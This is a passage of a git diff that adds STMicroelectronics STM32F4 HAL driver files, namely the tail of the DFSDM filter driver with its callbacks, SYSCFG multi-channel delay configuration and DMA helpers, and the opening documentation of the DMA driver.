+ * @brief Regular conversion complete callback. + * @note In interrupt mode, user has to read conversion value in this function + * using HAL_DFSDM_FilterGetRegularValue. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterRegConvCpltCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_FilterRegConvCpltCallback could be implemented in the user file. + */ +} + +/** + * @brief Half regular conversion complete callback. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterRegConvHalfCpltCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_FilterRegConvHalfCpltCallback could be implemented in the user file. + */ +} + +/** + * @brief Injected conversion complete callback. + * @note In interrupt mode, user has to read conversion value in this function + * using HAL_DFSDM_FilterGetInjectedValue. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterInjConvCpltCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_FilterInjConvCpltCallback could be implemented in the user file. + */ +} + +/** + * @brief Half injected conversion complete callback. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterInjConvHalfCpltCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_FilterInjConvHalfCpltCallback could be implemented in the user file. + */ +} + +/** + * @brief Filter analog watchdog callback. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Corresponding channel. + * @param Threshold Low or high threshold has been reached. + * @retval None + */ +__weak void HAL_DFSDM_FilterAwdCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t Channel, uint32_t Threshold) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + UNUSED(Channel); + UNUSED(Threshold); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_FilterAwdCallback could be implemented in the user file. + */ +} + +/** + * @brief Error callback. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +__weak void HAL_DFSDM_FilterErrorCallback(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdfsdm_filter); + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_DFSDM_FilterErrorCallback could be implemented in the user file. + */ +} + +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group4_Filter Filter state functions + * @brief Filter state functions + * +@verbatim + ============================================================================== + ##### Filter state functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Get the DFSDM filter state. + (+) Get the DFSDM filter error. +@endverbatim + * @{ + */ + +/** + * @brief This function allows to get the current DFSDM filter handle state. + * @param hdfsdm_filter DFSDM filter handle. + * @retval DFSDM filter state. + */ +HAL_DFSDM_Filter_StateTypeDef HAL_DFSDM_FilterGetState(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Return DFSDM filter handle state */ + return hdfsdm_filter->State; +} + +/** + * @brief This function allows to get the current DFSDM filter error. + * @param hdfsdm_filter DFSDM filter handle. + * @retval DFSDM filter error code. + */ +uint32_t HAL_DFSDM_FilterGetError(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + return hdfsdm_filter->ErrorCode; +} + +/** + * @} + */ + +/** @defgroup DFSDM_Exported_Functions_Group5_Filter MultiChannel operation functions + * @brief Filter state functions + * +@verbatim + ============================================================================== + ##### Filter MultiChannel operation functions ##### + ============================================================================== + [..] This section provides functions allowing to: + (+) Control the DFSDM Multi channel delay block +@endverbatim + * @{ + */ +#if defined(SYSCFG_MCHDLYCR_BSCKSEL) +/** + * @brief Select the DFSDM2 as clock source for the bitstream clock. + * @note The SYSCFG clock marco __HAL_RCC_SYSCFG_CLK_ENABLE() must be called + * before HAL_DFSDM_BitstreamClock_Start() + */ +void HAL_DFSDM_BitstreamClock_Start(void) +{ + uint32_t tmp = 0; + + tmp = SYSCFG->MCHDLYCR; + tmp = (tmp &(~SYSCFG_MCHDLYCR_BSCKSEL)); + + SYSCFG->MCHDLYCR = (tmp|SYSCFG_MCHDLYCR_BSCKSEL); +} + +/** + * @brief Stop the DFSDM2 as clock source for the bitstream clock. + * @note The SYSCFG clock marco __HAL_RCC_SYSCFG_CLK_ENABLE() must be called + * before HAL_DFSDM_BitstreamClock_Stop() + * @retval None + */ +void HAL_DFSDM_BitstreamClock_Stop(void) +{ + uint32_t tmp = 0U; + + tmp = SYSCFG->MCHDLYCR; + tmp = (tmp &(~SYSCFG_MCHDLYCR_BSCKSEL)); + + SYSCFG->MCHDLYCR = tmp; +} + +/** + * @brief Disable Delay Clock for DFSDM1/2. + * @param MCHDLY HAL_MCHDLY_CLOCK_DFSDM2. + * HAL_MCHDLY_CLOCK_DFSDM1. + * @note The SYSCFG clock marco __HAL_RCC_SYSCFG_CLK_ENABLE() must be called + * before HAL_DFSDM_DisableDelayClock() + * @retval None + */ +void HAL_DFSDM_DisableDelayClock(uint32_t MCHDLY) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_DELAY_CLOCK(MCHDLY)); + + tmp = SYSCFG->MCHDLYCR; + if(MCHDLY == HAL_MCHDLY_CLOCK_DFSDM2) + { + tmp = tmp &(~SYSCFG_MCHDLYCR_MCHDLY2EN); + } + else + { + tmp = tmp &(~SYSCFG_MCHDLYCR_MCHDLY1EN); + } + + SYSCFG->MCHDLYCR = tmp; +} + +/** + * @brief Enable Delay Clock for DFSDM1/2. + * @param MCHDLY HAL_MCHDLY_CLOCK_DFSDM2. + * HAL_MCHDLY_CLOCK_DFSDM1. + * @note The SYSCFG clock marco __HAL_RCC_SYSCFG_CLK_ENABLE() must be called + * before HAL_DFSDM_EnableDelayClock() + * @retval None + */ +void HAL_DFSDM_EnableDelayClock(uint32_t MCHDLY) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_DELAY_CLOCK(MCHDLY)); + + tmp = SYSCFG->MCHDLYCR; + tmp = tmp & ~MCHDLY; + + SYSCFG->MCHDLYCR = (tmp|MCHDLY); +} + +/** + * @brief Select the source for CKin signals for DFSDM1/2. + * @param source DFSDM2_CKIN_PAD. + * DFSDM2_CKIN_DM. + * DFSDM1_CKIN_PAD. + * DFSDM1_CKIN_DM. + * @retval None + */ +void HAL_DFSDM_ClockIn_SourceSelection(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_CLOCKIN_SELECTION(source)); + + tmp = SYSCFG->MCHDLYCR; + + if((source == HAL_DFSDM2_CKIN_PAD) || (source == HAL_DFSDM2_CKIN_DM)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2CFG); + + if(source == HAL_DFSDM2_CKIN_PAD) + { + source = 0x000000U; + } + } + else + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM1CFG); + } + + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Select the source for CKOut signals for DFSDM1/2. + * @param source: DFSDM2_CKOUT_DFSDM2. + * DFSDM2_CKOUT_M27. + * DFSDM1_CKOUT_DFSDM1. + * DFSDM1_CKOUT_M27. + * @retval None + */ +void HAL_DFSDM_ClockOut_SourceSelection(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_CLOCKOUT_SELECTION(source)); + + tmp = SYSCFG->MCHDLYCR; + + if((source == HAL_DFSDM2_CKOUT_DFSDM2) || (source == HAL_DFSDM2_CKOUT_M27)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2CKOSEL); + + if(source == HAL_DFSDM2_CKOUT_DFSDM2) + { + source = 0x000U; + } + } + else + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM1CKOSEL); + } + + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Select the source for DataIn0 signals for DFSDM1/2. + * @param source DATAIN0_DFSDM2_PAD. + * DATAIN0_DFSDM2_DATAIN1. + * DATAIN0_DFSDM1_PAD. + * DATAIN0_DFSDM1_DATAIN1. + * @retval None + */ +void HAL_DFSDM_DataIn0_SourceSelection(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_DATAIN0_SRC_SELECTION(source)); + + tmp = SYSCFG->MCHDLYCR; + + if((source == HAL_DATAIN0_DFSDM2_PAD)|| (source == HAL_DATAIN0_DFSDM2_DATAIN1)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2D0SEL); + if(source == HAL_DATAIN0_DFSDM2_PAD) + { + source = 0x00000U; + } + } + else + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM1D0SEL); + } + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Select the source for DataIn2 signals for DFSDM1/2. + * @param source DATAIN2_DFSDM2_PAD. + * DATAIN2_DFSDM2_DATAIN3. + * DATAIN2_DFSDM1_PAD. + * DATAIN2_DFSDM1_DATAIN3. + * @retval None + */ +void HAL_DFSDM_DataIn2_SourceSelection(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_DATAIN2_SRC_SELECTION(source)); + + tmp = SYSCFG->MCHDLYCR; + + if((source == HAL_DATAIN2_DFSDM2_PAD)|| (source == HAL_DATAIN2_DFSDM2_DATAIN3)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2D2SEL); + if (source == HAL_DATAIN2_DFSDM2_PAD) + { + source = 0x0000U; + } + } + else + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM1D2SEL); + } + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Select the source for DataIn4 signals for DFSDM2. + * @param source DATAIN4_DFSDM2_PAD. + * DATAIN4_DFSDM2_DATAIN5 + * @retval None + */ +void HAL_DFSDM_DataIn4_SourceSelection(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_DATAIN4_SRC_SELECTION(source)); + + tmp = SYSCFG->MCHDLYCR; + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2D4SEL); + + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Select the source for DataIn6 signals for DFSDM2. + * @param source DATAIN6_DFSDM2_PAD. + * DATAIN6_DFSDM2_DATAIN7. + * @retval None + */ +void HAL_DFSDM_DataIn6_SourceSelection(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_DATAIN6_SRC_SELECTION(source)); + + tmp = SYSCFG->MCHDLYCR; + + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2D6SEL); + + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Configure the distribution of the bitstream clock gated from TIM4_OC + * for DFSDM1 or TIM3_OC for DFSDM2 + * @param source DFSDM1_CLKIN0_TIM4OC2 + * DFSDM1_CLKIN2_TIM4OC2 + * DFSDM1_CLKIN1_TIM4OC1 + * DFSDM1_CLKIN3_TIM4OC1 + * DFSDM2_CLKIN0_TIM3OC4 + * DFSDM2_CLKIN4_TIM3OC4 + * DFSDM2_CLKIN1_TIM3OC3 + * DFSDM2_CLKIN5_TIM3OC3 + * DFSDM2_CLKIN2_TIM3OC2 + * DFSDM2_CLKIN6_TIM3OC2 + * DFSDM2_CLKIN3_TIM3OC1 + * DFSDM2_CLKIN7_TIM3OC1 + * @retval None + */ +void HAL_DFSDM_BitStreamClkDistribution_Config(uint32_t source) +{ + uint32_t tmp = 0U; + + assert_param(IS_DFSDM_BITSTREM_CLK_DISTRIBUTION(source)); + + tmp = SYSCFG->MCHDLYCR; + + if ((source == HAL_DFSDM1_CLKIN0_TIM4OC2) || (source == HAL_DFSDM1_CLKIN2_TIM4OC2)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM1CK02SEL); + } + else if ((source == HAL_DFSDM1_CLKIN1_TIM4OC1) || (source == HAL_DFSDM1_CLKIN3_TIM4OC1)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM1CK13SEL); + } + else if ((source == HAL_DFSDM2_CLKIN0_TIM3OC4) || (source == HAL_DFSDM2_CLKIN4_TIM3OC4)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2CK04SEL); + } + else if ((source == HAL_DFSDM2_CLKIN1_TIM3OC3) || (source == HAL_DFSDM2_CLKIN5_TIM3OC3)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2CK15SEL); + + }else if ((source == HAL_DFSDM2_CLKIN2_TIM3OC2) || (source == HAL_DFSDM2_CLKIN6_TIM3OC2)) + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2CK26SEL); + } + else + { + tmp = (tmp & ~SYSCFG_MCHDLYCR_DFSDM2CK37SEL); + } + + if((source == HAL_DFSDM1_CLKIN0_TIM4OC2) ||(source == HAL_DFSDM1_CLKIN1_TIM4OC1)|| + (source == HAL_DFSDM2_CLKIN0_TIM3OC4) ||(source == HAL_DFSDM2_CLKIN1_TIM3OC3)|| + (source == HAL_DFSDM2_CLKIN2_TIM3OC2) ||(source == HAL_DFSDM2_CLKIN3_TIM3OC1)) + { + source = 0x0000U; + } + + SYSCFG->MCHDLYCR = (source|tmp); +} + +/** + * @brief Configure multi channel delay block: Use DFSDM2 audio clock source as input + * clock for DFSDM1 and DFSDM2 filters to Synchronize DFSDMx filters. + * Set the path of the DFSDM2 clock output (dfsdm2_ckout) to the + * DFSDM1/2 CkInx and data inputs channels by configuring following MCHDLY muxes + * or demuxes: M1, M2, M3, M4, M5, M6, M7, M8, DM1, DM2, DM3, DM4, DM5, DM6, + * M9, M10, M11, M12, M13, M14, M15, M16, M17, M18, M19, M20 based on the + * contains of the DFSDM_MultiChannelConfigTypeDef structure + * @param mchdlystruct Structure of multi channel configuration + * @retval None + * @note The SYSCFG clock marco __HAL_RCC_SYSCFG_CLK_ENABLE() must be called + * before HAL_DFSDM_ConfigMultiChannelDelay() + * @note The HAL_DFSDM_ConfigMultiChannelDelay() function clears the SYSCFG-MCHDLYCR + * register before setting the new configuration. + */ +void HAL_DFSDM_ConfigMultiChannelDelay(DFSDM_MultiChannelConfigTypeDef* mchdlystruct) +{ + uint32_t mchdlyreg = 0U; + + assert_param(IS_DFSDM_DFSDM1_CLKOUT(mchdlystruct->DFSDM1ClockOut)); + assert_param(IS_DFSDM_DFSDM2_CLKOUT(mchdlystruct->DFSDM2ClockOut)); + assert_param(IS_DFSDM_DFSDM1_CLKIN(mchdlystruct->DFSDM1ClockIn)); + assert_param(IS_DFSDM_DFSDM2_CLKIN(mchdlystruct->DFSDM2ClockIn)); + assert_param(IS_DFSDM_DFSDM1_BIT_CLK((mchdlystruct->DFSDM1BitClkDistribution))); + assert_param(IS_DFSDM_DFSDM2_BIT_CLK(mchdlystruct->DFSDM2BitClkDistribution)); + assert_param(IS_DFSDM_DFSDM1_DATA_DISTRIBUTION(mchdlystruct->DFSDM1DataDistribution)); + assert_param(IS_DFSDM_DFSDM2_DATA_DISTRIBUTION(mchdlystruct->DFSDM2DataDistribution)); + + mchdlyreg = (SYSCFG->MCHDLYCR & 0x80103U); + + SYSCFG->MCHDLYCR = (mchdlyreg |(mchdlystruct->DFSDM1ClockOut)|(mchdlystruct->DFSDM2ClockOut)| + (mchdlystruct->DFSDM1ClockIn)|(mchdlystruct->DFSDM2ClockIn)| + (mchdlystruct->DFSDM1BitClkDistribution)| (mchdlystruct->DFSDM2BitClkDistribution)| + (mchdlystruct->DFSDM1DataDistribution)| (mchdlystruct->DFSDM2DataDistribution)); + +} +#endif /* SYSCFG_MCHDLYCR_BSCKSEL */ +/** + * @} + */ +/** + * @} + */ +/* End of exported functions -------------------------------------------------*/ + +/* Private functions ---------------------------------------------------------*/ +/** @addtogroup DFSDM_Private_Functions DFSDM Private Functions + * @{ + */ + +/** + * @brief DMA half transfer complete callback for regular conversion. + * @param hdma DMA handle. + * @retval None + */ +static void DFSDM_DMARegularHalfConvCplt(DMA_HandleTypeDef *hdma) +{ + /* Get DFSDM filter handle */ + DFSDM_Filter_HandleTypeDef* hdfsdm_filter = (DFSDM_Filter_HandleTypeDef*) ((DMA_HandleTypeDef*)hdma)->Parent; + + /* Call regular half conversion complete callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->RegConvHalfCpltCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterRegConvHalfCpltCallback(hdfsdm_filter); +#endif +} + +/** + * @brief DMA transfer complete callback for regular conversion. + * @param hdma DMA handle. + * @retval None + */ +static void DFSDM_DMARegularConvCplt(DMA_HandleTypeDef *hdma) +{ + /* Get DFSDM filter handle */ + DFSDM_Filter_HandleTypeDef* hdfsdm_filter = (DFSDM_Filter_HandleTypeDef*) ((DMA_HandleTypeDef*)hdma)->Parent; + + /* Call regular conversion complete callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->RegConvCpltCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterRegConvCpltCallback(hdfsdm_filter); +#endif +} + +/** + * @brief DMA half transfer complete callback for injected conversion. + * @param hdma DMA handle. + * @retval None + */ +static void DFSDM_DMAInjectedHalfConvCplt(DMA_HandleTypeDef *hdma) +{ + /* Get DFSDM filter handle */ + DFSDM_Filter_HandleTypeDef* hdfsdm_filter = (DFSDM_Filter_HandleTypeDef*) ((DMA_HandleTypeDef*)hdma)->Parent; + + /* Call injected half conversion complete callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->InjConvHalfCpltCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterInjConvHalfCpltCallback(hdfsdm_filter); +#endif +} + +/** + * @brief DMA transfer complete callback for injected conversion. + * @param hdma DMA handle. + * @retval None + */ +static void DFSDM_DMAInjectedConvCplt(DMA_HandleTypeDef *hdma) +{ + /* Get DFSDM filter handle */ + DFSDM_Filter_HandleTypeDef* hdfsdm_filter = (DFSDM_Filter_HandleTypeDef*) ((DMA_HandleTypeDef*)hdma)->Parent; + + /* Call injected conversion complete callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->InjConvCpltCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterInjConvCpltCallback(hdfsdm_filter); +#endif +} + +/** + * @brief DMA error callback. + * @param hdma DMA handle. + * @retval None + */ +static void DFSDM_DMAError(DMA_HandleTypeDef *hdma) +{ + /* Get DFSDM filter handle */ + DFSDM_Filter_HandleTypeDef* hdfsdm_filter = (DFSDM_Filter_HandleTypeDef*) ((DMA_HandleTypeDef*)hdma)->Parent; + + /* Update error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_DMA; + + /* Call error callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->ErrorCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterErrorCallback(hdfsdm_filter); +#endif +} + +/** + * @brief This function allows to get the number of injected channels. + * @param Channels bitfield of injected channels. + * @retval Number of injected channels. + */ +static uint32_t DFSDM_GetInjChannelsNbr(uint32_t Channels) +{ + uint32_t nbChannels = 0U; + uint32_t tmp; + + /* Get the number of channels from bitfield */ + tmp = (uint32_t) (Channels & DFSDM_LSB_MASK); + while(tmp != 0U) + { + if((tmp & 1U) != 0U) + { + nbChannels++; + } + tmp = (uint32_t) (tmp >> 1U); + } + return nbChannels; +} + +/** + * @brief This function allows to get the channel number from channel instance. + * @param Instance DFSDM channel instance. + * @retval Channel number. + */ +static uint32_t DFSDM_GetChannelFromInstance(DFSDM_Channel_TypeDef* Instance) +{ + uint32_t channel; + + /* Get channel from instance */ +#if defined(DFSDM2_Channel0) + if((Instance == DFSDM1_Channel0) || (Instance == DFSDM2_Channel0)) + { + channel = 0U; + } + else if((Instance == DFSDM1_Channel1) || (Instance == DFSDM2_Channel1)) + { + channel = 1U; + } + else if((Instance == DFSDM1_Channel2) || (Instance == DFSDM2_Channel2)) + { + channel = 2U; + } + else if((Instance == DFSDM1_Channel3) || (Instance == DFSDM2_Channel3)) + { + channel = 3U; + } + else if(Instance == DFSDM2_Channel4) + { + channel = 4U; + } + else if(Instance == DFSDM2_Channel5) + { + channel = 5U; + } + else if(Instance == DFSDM2_Channel6) + { + channel = 6U; + } + else /* DFSDM2_Channel7 */ + { + channel = 7U; + } + +#else + if(Instance == DFSDM1_Channel0) + { + channel = 0U; + } + else if(Instance == DFSDM1_Channel1) + { + channel = 1U; + } + else if(Instance == DFSDM1_Channel2) + { + channel = 2U; + } + else /* DFSDM1_Channel3 */ + { + channel = 3U; + } +#endif /* defined(DFSDM2_Channel0) */ + + return channel; +} + +/** + * @brief This function allows to really start regular conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +static void DFSDM_RegConvStart(DFSDM_Filter_HandleTypeDef* hdfsdm_filter) +{ + /* Check regular trigger */ + if(hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER) + { + /* Software start of regular conversion */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_RSWSTART; + } + else /* synchronous trigger */ + { + /* Disable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_DFEN); + + /* Set RSYNC bit in DFSDM_FLTCR1 register */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_RSYNC; + + /* Enable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_DFEN; + + /* If injected conversion was in progress, restart it */ + if(hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ) + { + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_JSWSTART; + } + /* Update remaining injected conversions */ + hdfsdm_filter->InjConvRemaining = (hdfsdm_filter->InjectedScanMode == ENABLE) ? \ + hdfsdm_filter->InjectedChannelsNbr : 1U; + } + } + /* Update DFSDM filter state */ + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) ? \ + HAL_DFSDM_FILTER_STATE_REG : HAL_DFSDM_FILTER_STATE_REG_INJ; +} + +/** + * @brief This function allows to really stop regular conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +static void DFSDM_RegConvStop(DFSDM_Filter_HandleTypeDef* hdfsdm_filter) +{ + /* Disable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_DFEN); + + /* If regular trigger was synchronous, reset RSYNC bit in DFSDM_FLTCR1 register */ + if(hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SYNC_TRIGGER) + { + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_RSYNC); + } + + /* Enable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_DFEN; + + /* If injected conversion was in progress, restart it */ + if(hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG_INJ) + { + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_JSWSTART; + } + /* Update remaining injected conversions */ + hdfsdm_filter->InjConvRemaining = (hdfsdm_filter->InjectedScanMode == ENABLE) ? \ + hdfsdm_filter->InjectedChannelsNbr : 1U; + } + + /* Update DFSDM filter state */ + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG) ? \ + HAL_DFSDM_FILTER_STATE_READY : HAL_DFSDM_FILTER_STATE_INJ; +} + +/** + * @brief This function allows to really start injected conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +static void DFSDM_InjConvStart(DFSDM_Filter_HandleTypeDef* hdfsdm_filter) +{ + /* Check injected trigger */ + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) + { + /* Software start of injected conversion */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_JSWSTART; + } + else /* external or synchronous trigger */ + { + /* Disable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_DFEN); + + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SYNC_TRIGGER) + { + /* Set JSYNC bit in DFSDM_FLTCR1 register */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_JSYNC; + } + else /* external trigger */ + { + /* Set JEXTEN[1:0] bits in DFSDM_FLTCR1 register */ + hdfsdm_filter->Instance->FLTCR1 |= hdfsdm_filter->ExtTriggerEdge; + } + + /* Enable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_DFEN; + + /* If regular conversion was in progress, restart it */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG) && \ + (hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER)) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_RSWSTART; + } + } + /* Update DFSDM filter state */ + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) ? \ + HAL_DFSDM_FILTER_STATE_INJ : HAL_DFSDM_FILTER_STATE_REG_INJ; +} + +/** + * @brief This function allows to really stop injected conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +static void DFSDM_InjConvStop(DFSDM_Filter_HandleTypeDef* hdfsdm_filter) +{ + /* Disable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_DFEN); + + /* If injected trigger was synchronous, reset JSYNC bit in DFSDM_FLTCR1 register */ + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SYNC_TRIGGER) + { + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_JSYNC); + } + else if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_EXT_TRIGGER) + { + /* Reset JEXTEN[1:0] bits in DFSDM_FLTCR1 register */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_JEXTEN); + } + + else + { + /* Nothing to do */ + } + /* Enable DFSDM filter */ + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_DFEN; + + /* If regular conversion was in progress, restart it */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG_INJ) && \ + (hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER)) + { + hdfsdm_filter->Instance->FLTCR1 |= DFSDM_FLTCR1_RSWSTART; + } + + /* Update remaining injected conversions */ + hdfsdm_filter->InjConvRemaining = (hdfsdm_filter->InjectedScanMode == ENABLE) ? \ + hdfsdm_filter->InjectedChannelsNbr : 1U; + + /* Update DFSDM filter state */ + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ) ? \ + HAL_DFSDM_FILTER_STATE_READY : HAL_DFSDM_FILTER_STATE_REG; +} +/** + * @} + */ +/* End of private functions --------------------------------------------------*/ + +/** + * @} + */ +#endif /* STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || STM32F413xx || STM32F423xx */ +#endif /* HAL_DFSDM_MODULE_ENABLED */ +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma.c new file mode 100644 index 000000000..9b4f8d8c2 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_dma.c @@ -0,0 +1,1305 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_dma.c + * @author MCD Application Team + * @brief DMA HAL module driver. + * + * This file provides firmware functions to manage the following + * functionalities of the Direct Memory Access (DMA) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral State and errors functions + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Enable and configure the peripheral to be connected to the DMA Stream + (except for internal SRAM/FLASH memories: no initialization is + necessary) please refer to Reference manual for connection between peripherals + and DMA requests. + + (#) For a given Stream, program the required configuration through the following parameters: + Transfer Direction, Source and Destination data formats, + Circular, Normal or peripheral flow control mode, Stream Priority level, + Source and Destination Increment mode, FIFO mode and its Threshold (if needed), + Burst mode for Source and/or Destination (if needed) using HAL_DMA_Init() function. + + -@- Prior to HAL_DMA_Init() the clock must be enabled for DMA through the following macros: + __HAL_RCC_DMA1_CLK_ENABLE() or __HAL_RCC_DMA2_CLK_ENABLE(). + + *** Polling mode IO operation *** + ================================= + [..] + (+) Use HAL_DMA_Start() to start DMA transfer after the configuration of Source + address and destination address and the Length of data to be transferred. + (+) Use HAL_DMA_PollForTransfer() to poll for the end of current transfer, in this + case a fixed Timeout can be configured by User depending from his application. + (+) Use HAL_DMA_Abort() function to abort the current transfer. + + *** Interrupt mode IO operation *** + =================================== + [..] + (+) Configure the DMA interrupt priority using HAL_NVIC_SetPriority() + (+) Enable the DMA IRQ handler using HAL_NVIC_EnableIRQ() + 